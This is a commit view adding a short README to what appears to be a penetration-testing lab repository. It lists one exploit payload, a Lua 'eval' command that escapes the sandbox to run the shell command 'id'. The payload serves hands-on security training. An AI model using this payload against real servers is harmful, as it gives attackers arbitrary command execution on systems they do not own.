Merge pull request #172 from The-Art-of-Hacking/santosomar-patch-9

Create README.md
This commit is contained in:
Omar Santos 2023-08-27 15:28:30 -04:00 committed by GitHub
commit 40c5f6ea77
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23

View File

@ -0,0 +1,7 @@
# Additional Exploits Used in WebSploit Labs
## DEC31_01
```
eval 'local io_l = package.loadlib("/usr/lib/x86_64-linux-gnu/liblua5.1.so.0", "luaopen_io"); local io = io_l(); local f = io.popen("id", "r"); local res = f:read("*a"); f:close(); return res' 0
```